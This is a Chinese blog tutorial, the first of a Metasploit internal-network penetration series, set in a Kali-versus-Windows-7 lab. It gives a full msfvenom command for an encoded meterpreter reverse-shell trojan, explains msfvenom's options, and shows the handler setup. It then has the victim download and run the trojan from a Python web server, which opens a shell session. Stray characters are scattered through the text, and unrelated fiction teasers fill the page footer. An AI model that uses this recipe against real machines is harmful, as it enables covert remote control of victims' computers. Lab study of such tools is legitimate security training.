MSF內網(wǎng)滲透系列1-生成木馬

環(huán)境:
攻擊機:kali 2020.1b
靶機:win7 32位

1.利用metasploit生成一個木馬。
利用msfvenom生成一個簡單的windows木馬

命令:msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=listen_ip LPORT=listen_port -b"\x00" -e x86/shikata_ga_nai -f exe > msf.exe

mvfvenom命令行選項

Option:
    -p, --payload    <payload>       指定需要使用的payload(攻擊荷載)。如果需要使用自定義的payload,請使用&#039;-&#039;或者stdin指定
    -l, --list       [module_type]   列出指定模塊的所有可用資源. 模塊類型包括: payloads, encoders, nops, all
    -n, --nopsled    <length>        為payload預先指定一個NOP滑動長度
    -f, --format     <format>        指定輸出格式 (使用 --help-formats 來獲取msf支持的輸出格式列表)
    -e, --encoder    [encoder]       指定需要使用的encoder(編碼器)
    -a, --arch       <architecture>  指定payload的目標架構
        --platform   <platform>      指定payload的目標平臺
    -s, --space      <length>        設定有效攻擊荷載的最大長度
    -b, --bad-chars  <list>          設定規(guī)避字符集葡粒,比如: &#039;\x00\xff&#039;
    -i, --iterations <count>         指定payload的編碼次數(shù)
    -c, --add-code   <path>          指定一個附加的win32 shellcode文件
    -x, --template   <path>          指定一個自定義的可執(zhí)行文件作為模板
    -k, --keep                       保護模板程序的動作,注入的payload作為一個新的進程運行
        --payload-options            列舉payload的標準選項
    -o, --out   <path>               保存payload
    -v, --var-name <name>            指定一個自定義的變量炕檩,以確定輸出格式
        --shellest                   最小化生成payload
    -h, --help                       查看幫助選項
        --help-formats               查看msf支持的輸出格式列表

所以上面生成木馬的命令意思是:生成一個windows 32位經(jīng)過編碼的木馬留攒,監(jiān)聽IP和端口為你msf監(jiān)聽的IP和端口,且過濾了\x00
運行該命令爷肝,是用ls查看文件猾浦,msf.exe已經(jīng)生成
2.開啟msf監(jiān)聽

msf> use exploit/multi/handler
使用handler模塊
msf exploit(handler)> set payload windows/meterpreter/reverse_tcp
設置監(jiān)聽payload,和生成木馬的payload一樣
msf exploit(handler)> set lhost listen_ip
設置監(jiān)聽IP
msf exploit(handler)> set lport listen_ip
設置監(jiān)聽端口
msf exploit(handler)>show options
查看配置信息灯抛,也可以使用info進行查看該模塊的詳細信息
msf exploit(handler)>exploit
執(zhí)行該模塊

3.傳遞木馬
在kali里面使用python簡單開啟一個http server

root@kali:~# python -m SimpleHTTPServer 888

win7靶機訪問kali 888端口進行下載msf.exe程序金赦,并運行
kali接收到一個session
使用 sessions 查看,此時已經(jīng)獲取到一個低權限的session对嚼,下一階段進行權限的提升夹抗。

?著作權歸作者所有,轉載或內容合作請聯(lián)系作者
  • 序言:七十年代末,一起剝皮案震驚了整個濱河市纵竖,隨后出現(xiàn)的幾起案子漠烧,更是在濱河造成了極大的恐慌,老刑警劉巖靡砌,帶你破解...
    沈念sama閱讀 218,451評論 6 506
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件已脓,死亡現(xiàn)場離奇詭異,居然都是意外死亡通殃,警方通過查閱死者的電腦和手機度液,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 93,172評論 3 394
  • 文/潘曉璐 我一進店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人堕担,你說我怎么就攤上這事已慢。” “怎么了照宝?”我有些...
    開封第一講書人閱讀 164,782評論 0 354
  • 文/不壞的土叔 我叫張陵蛇受,是天一觀的道長。 經(jīng)常有香客問我厕鹃,道長兢仰,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 58,709評論 1 294
  • 正文 為了忘掉前任剂碴,我火速辦了婚禮把将,結果婚禮上,老公的妹妹穿的比我還像新娘忆矛。我一直安慰自己察蹲,他們只是感情好,可當我...
    茶點故事閱讀 67,733評論 6 392
  • 文/花漫 我一把揭開白布催训。 她就那樣靜靜地躺著洽议,像睡著了一般。 火紅的嫁衣襯著肌膚如雪漫拭。 梳的紋絲不亂的頭發(fā)上亚兄,一...
    開封第一講書人閱讀 51,578評論 1 305
  • 那天,我揣著相機與錄音采驻,去河邊找鬼审胚。 笑死,一個胖子當著我的面吹牛礼旅,可吹牛的內容都是我干的膳叨。 我是一名探鬼主播,決...
    沈念sama閱讀 40,320評論 3 418
  • 文/蒼蘭香墨 我猛地睜開眼痘系,長吁一口氣:“原來是場噩夢啊……” “哼菲嘴!你這毒婦竟也來了?” 一聲冷哼從身側響起汰翠,我...
    開封第一講書人閱讀 39,241評論 0 276
  • 序言:老撾萬榮一對情侶失蹤临谱,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后奴璃,有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 45,686評論 1 314
  • 正文 獨居荒郊野嶺守林人離奇死亡城豁,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內容為張勛視角 年9月15日...
    茶點故事閱讀 37,878評論 3 336
  • 正文 我和宋清朗相戀三年苟穆,在試婚紗的時候發(fā)現(xiàn)自己被綠了。 大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點故事閱讀 39,992評論 1 348
  • 序言:一個原本活蹦亂跳的男人離奇死亡雳旅,死狀恐怖跟磨,靈堂內的尸體忽然破棺而出,到底是詐尸還是另有隱情攒盈,我是刑警寧澤抵拘,帶...
    沈念sama閱讀 35,715評論 5 346
  • 正文 年R本政府宣布,位于F島的核電站型豁,受9級特大地震影響僵蛛,放射性物質發(fā)生泄漏。R本人自食惡果不足惜迎变,卻給世界環(huán)境...
    茶點故事閱讀 41,336評論 3 330
  • 文/蒙蒙 一充尉、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧衣形,春花似錦驼侠、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,912評論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至句狼,卻和暖如春笋熬,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背鲜锚。 一陣腳步聲響...
    開封第一講書人閱讀 33,040評論 1 270
  • 我被黑心中介騙來泰國打工突诬, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留,地道東北人芜繁。 一個月前我還...
    沈念sama閱讀 48,173評論 3 370
  • 正文 我出身青樓旺隙,卻偏偏與公主長得像,于是被迫代替她去往敵國和親骏令。 傳聞我的和親對象是個殘疾皇子蔬捷,可洞房花燭夜當晚...
    茶點故事閱讀 44,947評論 2 355